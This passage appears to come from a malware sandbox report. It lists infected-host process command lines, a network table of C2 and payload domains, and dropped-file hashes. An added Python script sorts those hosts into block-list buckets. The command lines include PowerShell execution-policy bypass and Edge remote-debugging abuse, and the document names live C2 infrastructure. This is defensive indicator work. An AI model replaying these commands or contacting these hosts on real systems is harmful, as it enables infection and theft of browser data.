"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1392,15895515533642466494,13465131436476367318,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 /prefetch:3

C:\Users\Admin\AppData\Local\Temp\10107690101\8f50b7e3b0.exe

"C:\Users\Admin\AppData\Local\Temp\10107690101\8f50b7e3b0.exe"

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb22f346f8,0x7ffb22f34708,0x7ffb22f34718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2196,18317297001410750486,10356410680120650361,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2208 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2196,18317297001410750486,10356410680120650361,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2260 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2196,18317297001410750486,10356410680120650361,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2680 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2196,18317297001410750486,10356410680120650361,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2196,18317297001410750486,10356410680120650361,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:1

C:\Windows\system32\tasklist.exe

tasklist /FI "PID eq 2356"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vgpnm4xz\vgpnm4xz.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB81B.tmp" "c:\Users\Admin\AppData\Local\Temp\vgpnm4xz\CSCBC6EB7F1C56F4088AC3A5D91EAABC6C2.TMP"

C:\Users\Admin\AppData\Local\Temp\10107700101\6e33c98ed3.exe

"C:\Users\Admin\AppData\Local\Temp\10107700101\6e33c98ed3.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2196,18317297001410750486,10356410680120650361,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2220 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2196,18317297001410750486,10356410680120650361,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2204 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2196,18317297001410750486,10356410680120650361,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4312 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2196,18317297001410750486,10356410680120650361,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2200 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2196,18317297001410750486,10356410680120650361,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3956 /prefetch:2

C:\Windows\explorer.exe

explorer.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2196,18317297001410750486,10356410680120650361,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3964 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2196,18317297001410750486,10356410680120650361,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2208 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2196,18317297001410750486,10356410680120650361,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4784 /prefetch:2

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2196,18317297001410750486,10356410680120650361,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2536 /prefetch:2

C:\Windows\explorer.exe

explorer.exe

C:\Users\Admin\AppData\Local\Temp\10107710101\8a07a872cb.exe

"C:\Users\Admin\AppData\Local\Temp\10107710101\8a07a872cb.exe"

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\explorer.exe

explorer.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 e5.o.lencr.org udp
GB 104.86.110.200:80 e5.o.lencr.org tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
US 8.8.8.8:53 joyfulhezart.tech udp
US 8.8.8.8:53 hardswarehub.today udp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
US 8.8.8.8:53 gadgethgfub.icu udp
US 8.8.8.8:53 hardrwarehaven.run udp
US 8.8.8.8:53 techmindzs.live udp
US 8.8.8.8:53 codxefusion.top udp
US 104.21.69.194:443 codxefusion.top tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
US 104.21.69.194:443 codxefusion.top tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
US 104.21.69.194:443 codxefusion.top tcp
US 104.21.69.194:443 codxefusion.top tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
US 8.8.8.8:53 explorebieology.run udp
US 104.21.9.123:443 moderzysics.top tcp
US 104.21.69.194:443 codxefusion.top tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
US 104.21.9.123:443 moderzysics.top tcp
US 8.8.8.8:53 towerbingobongoboom.com udp
US 213.209.150.137:4000 towerbingobongoboom.com tcp
US 104.21.69.194:443 codxefusion.top tcp
US 213.209.150.137:4117 towerbingobongoboom.com tcp
US 104.21.9.123:443 moderzysics.top tcp
US 8.8.8.8:53 www.dropbox.com udp
GB 162.125.64.18:443 www.dropbox.com tcp
US 104.21.9.123:443 moderzysics.top tcp
CH 185.208.156.162:80 185.208.156.162 tcp
US 8.8.8.8:53 www.google.com udp
GB 216.58.204.68:443 www.google.com tcp
GB 216.58.204.68:443 www.google.com tcp
US 8.8.8.8:53 ogads-pa.googleapis.com udp
US 8.8.8.8:53 apis.google.com udp
GB 172.217.169.74:443 ogads-pa.googleapis.com tcp
US 104.21.9.123:443 moderzysics.top tcp
GB 216.58.201.110:443 apis.google.com tcp
GB 172.217.169.74:443 ogads-pa.googleapis.com udp
US 8.8.8.8:53 play.google.com udp
GB 142.250.200.14:443 play.google.com tcp
GB 142.250.200.14:443 play.google.com udp
US 104.21.9.123:443 moderzysics.top tcp
US 8.8.8.8:53 clients2.google.com udp
GB 142.250.180.14:443 clients2.google.com tcp
US 8.8.8.8:53 clients2.googleusercontent.com udp
GB 172.217.169.65:443 clients2.googleusercontent.com tcp
N/A 127.0.0.1:9223 tcp
N/A 127.0.0.1:9223 tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
US 150.171.28.10:443 tcp
US 8.8.8.8:53 exarthynature.run udp
US 104.21.112.1:443 exarthynature.run tcp
US 104.21.112.1:443 exarthynature.run tcp
N/A 127.0.0.1:9223 tcp
US 8.8.8.8:53 nw-umwatson.events.data.microsoft.com udp
US 20.189.173.21:443 nw-umwatson.events.data.microsoft.com tcp
US 104.21.112.1:443 exarthynature.run tcp
US 104.21.112.1:443 exarthynature.run tcp
N/A 224.0.0.251:5353 udp
US 104.21.112.1:443 exarthynature.run tcp
N/A 127.0.0.1:9223 tcp
US 104.21.112.1:443 exarthynature.run tcp
NL 185.156.73.73:80 185.156.73.73 tcp
N/A 127.0.0.1:9223 tcp
N/A 127.0.0.1:9223 tcp
NL 149.154.167.99:443 t.me tcp
US 150.171.28.10:443 tcp
US 150.171.28.10:443 tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tcp
US 150.171.28.10:443 tcp
US 8.8.8.8:53 nw-umwatson.events.data.microsoft.com udp
US 20.189.173.22:443 nw-umwatson.events.data.microsoft.com tcp
NL 185.156.73.73:80 185.156.73.73 tcp
US 8.8.8.8:53 uncertainyelemz.bet udp
US 8.8.8.8:53 hobbyedsmoker.live udp
US 8.8.8.8:53 dsfljsdfjewf.info udp
US 8.8.8.8:53 deaddereaste.today udp
US 8.8.8.8:53 subawhipnator.life udp
US 8.8.8.8:53 privileggoe.live udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 pastedeputten.life udp
US 8.8.8.8:53 steamcommunity.com udp
US 8.8.8.8:53 dawtastream.bet udp
GB 104.82.234.109:443 steamcommunity.com tcp
US 185.199.110.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 foresctwhispers.top udp
US 8.8.8.8:53 tracnquilforest.life udp
US 8.8.8.8:53 collapimga.fun udp
US 8.8.8.8:53 seizedsentec.online udp
US 8.8.8.8:53 strawpeasaen.fun udp
US 8.8.8.8:53 quietswtreams.life udp
US 8.8.8.8:53 starrynsightsky.icu udp
US 8.8.8.8:53 earthsymphzony.today udp
GB 104.82.234.109:443 steamcommunity.com tcp
US 172.67.220.226:443 farmingtzricks.top tcp
US 172.67.220.226:443 farmingtzricks.top tcp
US 172.67.220.226:443 farmingtzricks.top tcp
US 172.67.220.226:443 farmingtzricks.top tcp
US 172.67.220.226:443 farmingtzricks.top tcp
US 172.67.220.226:443 farmingtzricks.top tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 172.67.220.226:443 farmingtzricks.top tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
US 172.67.220.226:443 farmingtzricks.top tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
US 172.67.220.226:443 farmingtzricks.top tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
US 8.8.8.8:53 croprojegies.run udp
US 104.21.64.1:443 croprojegies.run tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
US 104.21.64.1:443 croprojegies.run tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 104.21.64.1:443 croprojegies.run tcp
US 104.21.64.1:443 croprojegies.run tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
US 104.21.64.1:443 croprojegies.run tcp
N/A 127.0.0.1:9223 tcp
N/A 127.0.0.1:9223 tcp
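The table above mixes four kinds of traffic, and a responder has to separate them before anything in it becomes an indicator: sandbox and Windows background noise (8.8.8.8 resolver, google/microsoft/bing telemetry, the e5.o.lencr.org OCSP fetch, mDNS to 224.0.0.251), legitimate services the payloads lean on (steamcommunity.com and t.me are the dead-drop resolver pattern the Vidar signature in this report is built around; github.com, objects.githubusercontent.com, pastebin.com and www.dropbox.com host second-stage payloads), the XMRig pool connection to pool.hashvault.pro, and the direct loader/C2 hosts (bare IPs such as 176.113.115.7:80, 45.144.212.77:16000 and 45.154.98.175:6969, the towerbingobongoboom.com:4000/4117 pair, and the run of throwaway .bet/.top/.life/.fun domains). The 127.0.0.1:9223 rows line up with the report's "Uses browser remote debugging" signature, and the many domains that appear only as DNS queries with no follow-up TCP connection are worth blocking anyway (they read as a rotation list). The script below is an added triage example, not part of the report or of the sandbox vendor's tooling; the background, dead-drop and mining-pool lists and the bucket names are the editor's assumptions, and the embedded table is a constructed, abridged excerpt in the page's own row format.

```python
"""Triage the report's Network table: separate likely C2 / payload hosts from
background noise and from legitimate services used as dead drops."""
import re
from collections import defaultdict

# Constructed, abridged excerpt of the Network table (same row format as the page).
NETWORK_TABLE = """\
Country Destination Domain Proto
RU 176.113.115.6:80 176.113.115.6 tcp
NL 45.144.212.77:16000 45.144.212.77 tcp
US 8.8.8.8:53 cobolrationumelawrtewarms.com udp
NL 107.189.27.66:80 cobolrationumelawrtewarms.com tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
NL 45.154.98.175:6969 tcp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 192.248.189.11:443 pool.hashvault.pro tcp
US 8.8.8.8:53 dawtastream.bet udp
US 172.67.220.226:443 farmingtzricks.top tcp
US 213.209.150.137:4000 towerbingobongoboom.com tcp
US 8.8.8.8:53 www.google.com udp
GB 216.58.204.68:443 www.google.com tcp
N/A 127.0.0.1:9223 tcp
N/A 224.0.0.251:5353 udp
"""

# A row is: <country> <ip>:<port> [<domain>] <proto>; the Domain column may be empty.
ROW_RE = re.compile(
    r"^(?P<cc>\S+)\s+(?P<ip>[\d.]+):(?P<port>\d+)\s+"
    r"(?:(?P<domain>\S+)\s+)?(?P<proto>tcp|udp)$"
)

# Classification lists are the editor's assumptions, not part of the report.
DNS_RESOLVERS = {"8.8.8.8"}
BACKGROUND = ("google.com", "googleapis.com", "googleusercontent.com",
              "microsoft.com", "bing.net", "lencr.org")
DEAD_DROP_SERVICES = ("github.com", "githubusercontent.com", "pastebin.com",
                      "t.me", "steamcommunity.com", "dropbox.com")
MINING_POOLS = ("hashvault.pro",)


def _under(host, names):
    """True if host equals one of names or is a subdomain of it."""
    return any(host == n or host.endswith("." + n) for n in names)


def parse_rows(text):
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if m:                      # the header line does not match and is skipped
            yield m.groupdict()


def triage(text):
    """Bucket every destination; DNS lookups only record that a name was queried."""
    buckets, resolved, connected = defaultdict(set), set(), set()
    for r in parse_rows(text):
        host = r["domain"] or r["ip"]
        if r["ip"] in DNS_RESOLVERS and r["port"] == "53":
            resolved.add(host)
            continue
        connected.add(host)
        dest = f"{host}:{r['port']}/{r['proto']}"
        if r["ip"].startswith("127."):
            buckets["local_debug_port"].add(dest)      # e.g. browser remote debugging
        elif r["ip"].startswith("224."):
            buckets["background"].add(dest)            # multicast (mDNS)
        elif _under(host, MINING_POOLS):
            buckets["mining_pool"].add(dest)
        elif _under(host, BACKGROUND):
            buckets["background"].add(dest)
        elif _under(host, DEAD_DROP_SERVICES):
            buckets["dead_drop_or_payload_host"].add(dest)
        else:
            buckets["c2_or_payload"].add(dest)
    # Names queried but never connected to: rotation-list candidates, still blockable.
    buckets["dns_only"] = resolved - connected
    return dict(buckets)


def block_list(result):
    """Hosts worth blocking outright: direct C2/payload hosts, pools, DNS-only names."""
    hosts = {d.rsplit(":", 1)[0]
             for k in ("c2_or_payload", "mining_pool") for d in result.get(k, ())}
    return sorted(hosts | result.get("dns_only", set()))


if __name__ == "__main__":
    res = triage(NETWORK_TABLE)
    for bucket, dests in sorted(res.items()):
        print(bucket, sorted(dests))
    print("block:", block_list(res))
```

The dead-drop bucket is deliberately not on the block list: blocking github.com or t.me on an endpoint is rarely acceptable, so those rows become hunting queries (which process talked to steamcommunity.com without a browser parent?) rather than firewall entries.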

Files

memory/116-0-0x0000000000700000-0x0000000000BB0000-memory.dmp

memory/116-1-0x0000000077034000-0x0000000077036000-memory.dmp

memory/116-2-0x0000000000701000-0x000000000072F000-memory.dmp

memory/116-3-0x0000000000700000-0x0000000000BB0000-memory.dmp

memory/116-4-0x0000000000700000-0x0000000000BB0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

MD5 457a48e9c0a205ea619dd5d5b4c2a6c3
SHA1 15b8560577817747c13dc391d973ad2e26901315
SHA256 f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e
SHA512 ce53209091c4e22937bf82bd55e219347d4d3a5c339db8b5605ee4753edc2dbe292c40a3da7d736908c27f5c99636fd3c06ab4c81254366d89801cf3d9037e5a

memory/116-18-0x0000000000700000-0x0000000000BB0000-memory.dmp

memory/4896-17-0x0000000000050000-0x0000000000500000-memory.dmp

memory/4896-19-0x0000000000051000-0x000000000007F000-memory.dmp

memory/4896-20-0x0000000000050000-0x0000000000500000-memory.dmp

memory/4896-21-0x0000000000050000-0x0000000000500000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe

MD5 5b3ed060facb9d57d8d0539084686870
SHA1 9cae8c44e44605d02902c29519ea4700b4906c76
SHA256 7c711ab33a034ed733b18b76a0154c56065c74a9481cbd0e4f65aa2b03c8a207
SHA512 6733ae1c74c759031fb2de99beb938f94fc77ed8cc3b42b2b1d24a597f9e74eeab5289f801407619485f81fccaa55546344773e9a71b40b1af6b3c767b69e71a

C:\Users\Admin\AppData\Local\Temp\D64B.tmp\D64C.tmp\D64D.bat

MD5 3895cb9413357f87a88c047ae0d0bd40
SHA1 227404dd0f7d7d3ea9601eecd705effe052a6c91
SHA256 8140df06ebcda4d8b85bb00c3c0910efc14b75e53e7a1e4f7b6fa515e4164785
SHA512 a886081127b4888279aba9b86aa50a74d044489cf43819c1dea793a410e39a62413ceb7866f387407327b348341b2ff03cbe2430c57628a5e5402447d3070ca1

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mimzltsg.xrf.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3108-38-0x000001C7A7A30000-0x000001C7A7A52000-memory.dmp

memory/4896-48-0x0000000000050000-0x0000000000500000-memory.dmp

memory/4896-49-0x0000000000050000-0x0000000000500000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe

MD5 73636685f823d103c54b30bc457c7f0d
SHA1 597dba03dce00cf6d30b082c80c8f9108ae90ccf
SHA256 1edc123e5a8ea5ce814e2759ee38453404d4af72a3577b0af55e8d99fa38ef1c
SHA512 183d4901a72afc044ef13c3a2cc21f93aefd954665f981c7886afc9019ca7d46f76b3459789dff5721542f2f9e7bbf606d7df68328e772e4c66dc789964f43f7

C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe

MD5 47177b7fbf1ce282fb87da80fd264b3f
SHA1 d07d2f9624404fa882eb94ee108f222d76bbbd4c
SHA256 e3a190fc0f3e2be612c896ad1bda174271ee57d493f1b39030de1cbb5b7090eb
SHA512 059db11d303355b85e94031a54b0e6bac30bc9e2475bf3fceb9c01063af6f593d455fb54f8893ca37a150b598a9863b04f37056ef589656a6e83da719b330db9

memory/1860-92-0x0000000000090000-0x00000000000A0000-memory.dmp

C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe

MD5 1dc908064451d5d79018241cea28bc2f
SHA1 f0d9a7d23603e9dd3974ab15400f5ad3938d657a
SHA256 d521f17349128cc6339aecb7a5e41f91ab02d338e5c722cd809d96c3a1c64454
SHA512 6f072459376181f7ddb211cf615731289706e7d90b7c81e306c6cd5c79311544d0b4be946791ae4fad3c2c034901bc0a2fd5b2a710844e3fe928a92d1cc0814f

memory/2248-106-0x0000000000400000-0x0000000000840000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 556084f2c6d459c116a69d6fedcc4105
SHA1 633e89b9a1e77942d822d14de6708430a3944dbc
SHA256 88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA512 0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 eb4d127b8a6f84a1cee423c5e3e3a51d
SHA1 c55263a8ff097067f2393ce2120801a445fd1949
SHA256 d73b077e2ae7f7608ebf774fb83ab13c7bc7a5c3e4d9d96fda2bf695dc698514
SHA512 45a52004f8b63ac089de017437ba0e03335f18469942795d36ce3c3d017f842e582103c91e07d9af0fa8dfbbe6f2f68f2fac91383a48b6535952a8630911f21e

C:\Users\Admin\AppData\Local\Temp\installer.ps1

MD5 b6d611af4bea8eaaa639bbf024eb0e2d
SHA1 0b1205546fd80407d85c9bfbed5ff69d00645744
SHA256 8cd3bf95cedcf3469d0044976c66cbf22cd2fecf21ae4f94986d7211d6ba9a2b
SHA512 d8a4ec5bd986884959db3edfd48e2bf4c70ead436f81eab73b104aa0ff0f5dadfb6227cb2dab1f979f0dbb3aafbc1889ed571fb6e9444a09ae984b789314463d

\??\c:\Users\Admin\AppData\Local\Temp\31xayw5v\31xayw5v.cmdline

MD5 b0a97c4ef81b608d237aa9925507d758
